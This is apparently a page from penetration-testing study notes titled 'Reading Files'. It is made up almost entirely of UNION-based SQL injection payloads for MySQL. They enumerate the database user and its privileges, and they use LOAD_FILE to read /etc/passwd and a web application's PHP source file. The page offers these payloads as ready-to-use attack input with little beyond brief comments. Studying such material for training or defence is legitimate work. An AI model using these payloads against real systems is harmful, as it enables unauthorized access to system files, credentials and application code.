Reading Files

DB user

cn'
UNION
SELECT 1,user,3,4
from mysql.user--

User privileges

cn'
UNION
SELECT 1,super_priv,3,4
FROM mysql.user
WHERE user="root"-- # only show privileges for current user root

cn'
UNION
SELECT 1,grantee,privilege_type, 4
FROM information_schema.user_privileges
WHERE grantee="'root'@'localhost'"-- # to only show current user root privileges

LOAD_FILE

cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4--

cn' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- 
# Press Crtl + U to view HTML source code

PreviousDatabase Enumeration NextWriting Files

Last updated 9 months ago